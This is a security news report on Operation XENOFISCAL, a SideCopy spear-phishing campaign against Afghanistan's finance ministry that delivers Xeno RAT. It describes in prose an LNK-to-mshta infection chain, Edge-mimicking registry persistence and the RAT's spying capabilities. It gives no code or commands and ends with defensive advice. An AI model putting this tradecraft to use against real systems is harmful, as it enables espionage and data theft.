SideCopy APT Hits Afghanistan Finance Ministry with Xeno RAT in Operation XENOFISCAL

Researchers at Seqrite Labs have uncovered a spear-phishing campaign dubbed Operation XENOFISCAL, attributed to the Pakistan-aligned SideCopy threat group, which is targeting Afghanistan's Ministry of Finance and several provincial revenue directorates. The operation opens with a ZIP archive containing a malicious Windows Shortcut (LNK) file bearing a carefully crafted Pashto-language filename—a deliberate choice reflecting the attacker's familiarity with Afghan government circles. Pashto-speaking officials and provincial-level government employees are also in the crosshairs, suggesting a broad intelligence-gathering effort aimed at South Asian financial institutions. Organizations can verify suspicious domains used in such lures with a WHOIS lookup to identify recently registered or anonymized infrastructure.

Once executed, the LNK file abuses mshta.exe to fetch a remote HTML Application (HTA) from a compromised Afghan education domain, triggering the in-memory execution of obfuscated JavaScript. The payload establishes Registry-based persistence by masquerading as Microsoft Edge, then drops Xeno RAT 1.8.7 alongside a decoy document via a DLL-based loader. SideCopy operates under the broader Transparent Tribe (APT36) umbrella, and this activity mirrors a similar April 2025 wave in which the group deployed Xeno RAT, Spark RAT, and CurlBack RAT against Indian entities, reinforcing its sustained focus on regional government targets.

Xeno RAT is an open-source remote access trojan that communicates with its operator over TCP and is capable of loading external DLL modules, exfiltrating data, performing file operations, logging keystrokes, capturing screenshots and clipboard content, tracking the webcam and microphone, and supporting SOCKS5 proxy-based network tunneling. Defenders monitoring for such C2 traffic can use a port scanner to identify unexpected listeners on endpoints and a DNS leak test to detect anomalous outbound resolution patterns.

The disclosure coincides with a separate report on Transparent Tribe using weaponized Linux .desktop files delivered through WhatsApp-based social engineering to target Indian military and defense infrastructure, with lures themed around armored vehicle procurement contracts. According to researcher R.D. Tarun, the staged shell payload execution pattern suggests an evolving tradecraft that extends the group's reach across both Windows and Linux environments in South Asia. As SideCopy continues to iterate, security teams are urged to harden email gateways, restrict mshta.exe usage, and monitor Registry modifications associated with Edge-mimicking persistence.